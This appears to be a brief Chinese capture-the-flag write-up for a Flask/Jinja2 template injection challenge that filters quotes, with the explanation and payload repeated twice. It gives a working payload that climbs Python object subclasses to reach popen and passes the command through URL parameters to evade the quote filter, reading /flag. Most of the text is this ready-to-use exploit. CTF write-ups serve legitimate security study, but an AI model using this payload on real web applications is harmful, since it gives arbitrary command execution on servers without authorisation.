EXP
这题过滤了单双引号,可以使用request.args.name进行get传参绕过,也可以使用chr编码绕过
payload:
?name={{{}.__class__.__base__.__subclasses__()[132].__init__.__globals__[request.args.a](request.args.b).read()}}&a=popen&b=cat /flag
这题过滤了单双引号,可以使用request.args.name进行get传参绕过,也可以使用chr编码绕过
payload:
?name={{{}.__class__.__base__.__subclasses__()[132].__init__.__globals__[request.args.a](request.args.b).read()}}&a=popen&b=cat /flag